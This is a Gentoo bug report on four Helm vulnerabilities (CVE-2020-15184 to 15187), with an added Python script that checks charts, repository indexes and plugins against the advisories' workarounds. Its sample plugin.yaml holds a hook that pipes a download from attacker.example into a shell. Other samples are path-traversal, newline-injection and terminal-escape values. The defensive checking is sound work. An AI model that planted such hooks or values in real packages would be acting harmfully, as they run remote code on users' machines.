Bug 746428 (CVE-2020-15184, CVE-2020-15185, CVE-2020-15186, CVE-2020-15187) - <app-admin/helm-3.3.2: Multiple vulnerabilities (CVE-2020-{15184,15185,15186,15187})
Status: RESOLVED FIXED
Alias: CVE-2020-15184, CVE-2020-15185, CVE-2020-15186, CVE-2020-15187
Product: Gentoo Security
Classification: Unclassified
Component: Vulnerabilities
Hardware: All Linux
Importance: Normal minor
Assignee: Gentoo Security
Whiteboard: B4 [noglsa]
Reported: 2020-10-04 03:28 UTC by John Helmert III
Modified: 2021-01-10 16:42 UTC
Description John Helmert III 2020-10-04 03:28:54 UTC
CVE-2020-15184 (https://github.com/helm/helm/security/advisories/GHSA-9vp5-m38w-j776):

In Helm before versions 2.16.11 and 3.3.2 there is a bug in which the `alias` field on a `Chart.yaml` is not properly sanitized. This could lead to the injection of unwanted information into a chart. This issue has been patched in Helm 3.3.2 and 2.16.11. A possible workaround is to manually review the `dependencies` field of any untrusted chart, verifying that the `alias` field is either not used, or (if used) does not contain newlines or path characters.

CVE-2020-15185 (https://github.com/helm/helm/security/advisories/GHSA-jm56-5h66-w453):

In Helm before versions 2.16.11 and 3.3.2, a Helm repository can contain duplicates of the same chart, with the last one always used. If a repository is compromised, this lowers the level of access that an attacker needs to inject a bad chart into a repository. To perform this attack, an attacker must have write access to the index file (which can occur during a MITM attack on a non-SSL connection). This issue has been patched in Helm 3.3.2 and 2.16.11. A possible workaround is to manually review the index file in the Helm repository cache before installing software.

CVE-2020-15186 (https://github.com/helm/helm/security/advisories/GHSA-m54r-vrmv-hw33):

In Helm before versions 2.16.11 and 3.3.2 plugin names are not sanitized properly. As a result, a malicious plugin author could use characters in a plugin name that would result in unexpected behavior, such as duplicating the name of another plugin or spoofing the output to `helm --help`. This issue has been patched in Helm 3.3.2. A possible workaround is to not install untrusted Helm plugins. Examine the `name` field in the `plugin.yaml` file for a plugin, looking for characters outside of the [a-zA-Z0-9._-] range.

CVE-2020-15187 (https://github.com/helm/helm/security/advisories/GHSA-c52f-pq47-2r9j):

In Helm before versions 2.16.11 and 3.3.2, a Helm plugin can contain duplicates of the same entry, with the last one always used. If a plugin is compromised, this lowers the level of access that an attacker needs to modify a plugin's install hooks, causing a local execution attack. To perform this attack, an attacker must have write access to the git repository or plugin archive (.tgz) while being downloaded (which can occur during a MITM attack on a non-SSL connection). This issue has been patched in Helm 2.16.11 and Helm 3.3.2. As a possible workaround make sure to install plugins using a secure connection protocol like SSL.

Need a bump to 2.16.11 and 3.3.2.
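The four advisories quoted above each end with a manual workaround (inspect `alias` fields in `Chart.yaml`, look for duplicate entries in the repository `index.yaml`, check the `name` in `plugin.yaml` against `[a-zA-Z0-9._-]`, and watch for duplicated keys in a plugin's metadata). The script below is an added example that turns those four workarounds into offline pre-install checks; it is not Helm project code and not part of the bug report. It assumes `Chart.yaml`, `index.yaml` and `plugin.yaml` have already been loaded into Python mappings (for instance with `yaml.safe_load`), and my reading of "path characters" for the alias check (separators and `..`) is an assumption, not Helm's exact rule. All sample inputs are constructed.

```python
import re

# CVE-2020-15186 workaround: a plugin name outside this range is suspicious
# (terminal escapes, whitespace, path separators, look-alike names).
SAFE_NAME = re.compile(r"^[a-zA-Z0-9._-]+$")

# CVE-2020-15184 workaround: an alias must not contain newlines or path
# characters. "Path characters" is taken here to mean separators and
# parent-directory references (assumption, not Helm's own validation rule).
_BAD_ALIAS_SUBSTRINGS = ("\n", "\r", "/", "\\", "..")


def unsafe_aliases(chart: dict) -> list:
    """Return descriptions of dependency aliases that fail the CVE-2020-15184 check."""
    findings = []
    for dep in chart.get("dependencies") or []:
        alias = dep.get("alias")
        if alias is None:
            continue  # alias not used: nothing to check
        if not isinstance(alias, str) or any(s in alias for s in _BAD_ALIAS_SUBSTRINGS):
            findings.append("dependency %r: unsafe alias %r" % (dep.get("name"), alias))
    return findings


def duplicate_index_entries(index: dict) -> list:
    """CVE-2020-15185: report chart name/version pairs listed more than once.

    Vulnerable Helm used the last entry, so a second copy of an existing
    version is exactly what a tampered index.yaml would carry.
    """
    seen = set()
    findings = []
    for name, versions in (index.get("entries") or {}).items():
        for entry in versions or []:
            key = (name, entry.get("version"))
            if key in seen:
                findings.append("duplicate entry %s-%s (digest %s)"
                                % (name, entry.get("version"), entry.get("digest")))
            seen.add(key)
    return findings


def unsafe_plugin_name(plugin: dict) -> list:
    """CVE-2020-15186: flag a plugin.yaml name with characters outside [a-zA-Z0-9._-]."""
    name = plugin.get("name")
    if not isinstance(name, str) or not SAFE_NAME.match(name):
        return ["plugin name %r contains characters outside [a-zA-Z0-9._-]" % (name,)]
    return []


def duplicate_top_level_keys(yaml_text: str) -> list:
    """CVE-2020-15187: top-level keys that appear more than once in raw plugin.yaml text.

    This must run on the raw text: YAML loaders such as PyYAML accept duplicate
    keys and keep the last one, which is the "last one always used" behaviour
    the advisory describes. Only unindented `key:` lines are considered.
    """
    counts = {}
    for line in yaml_text.splitlines():
        m = re.match(r"^([A-Za-z_][A-Za-z0-9_-]*)\s*:", line)
        if m:
            counts[m.group(1)] = counts.get(m.group(1), 0) + 1
    return [k for k, n in counts.items() if n > 1]


# --- constructed sample inputs (not taken from any real chart or repository) ---
SAMPLE_CHART = {
    "name": "app", "version": "0.1.0",
    "dependencies": [
        {"name": "postgresql", "version": "9.x", "alias": "db"},
        {"name": "redis", "version": "10.x", "alias": "../outside"},
        {"name": "nginx", "version": "1.x", "alias": "web\nextra: injected"},
    ],
}
SAMPLE_INDEX = {
    "entries": {
        "nginx": [
            {"version": "1.0.0", "digest": "aaa"},
            {"version": "1.0.1", "digest": "bbb"},
            {"version": "1.0.0", "digest": "ccc"},  # second copy wins on vulnerable Helm
        ],
        "redis": [{"version": "2.0.0", "digest": "ddd"}],
    }
}
SAMPLE_PLUGIN = {"name": "diff\x1b[2J", "version": "0.1.0"}  # embedded terminal escape
SAMPLE_PLUGIN_YAML = (
    "name: diff\n"
    "version: 0.1.0\n"
    "hooks:\n"
    "  install: ./install.sh\n"
    "hooks:\n"  # duplicate key; a last-wins parser takes this hook
    "  install: curl http://attacker.example/x | sh\n"
)


def run_all() -> dict:
    """Collect every finding; all-empty lists mean the inputs passed the four checks."""
    return {
        "CVE-2020-15184": unsafe_aliases(SAMPLE_CHART),
        "CVE-2020-15185": duplicate_index_entries(SAMPLE_INDEX),
        "CVE-2020-15186": unsafe_plugin_name(SAMPLE_PLUGIN),
        "CVE-2020-15187": duplicate_top_level_keys(SAMPLE_PLUGIN_YAML),
    }


if __name__ == "__main__":
    for cve, findings in run_all().items():
        print(cve, "OK" if not findings else findings)
```

Point the checks at `~/.cache/helm/repository/*-index.yaml` (the index cache the CVE-2020-15185 workaround refers to) and at the unpacked plugin directory before running `helm install` or `helm plugin install`; none of this replaces upgrading to 2.16.11 / 3.3.2 or fetching plugins over TLS, it only makes the manual review the advisories suggest repeatable.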
Comment 1 Sam James 2020-11-16 18:59:21 UTC
Hi William, could you bump to 2.16.11 too? Thanks!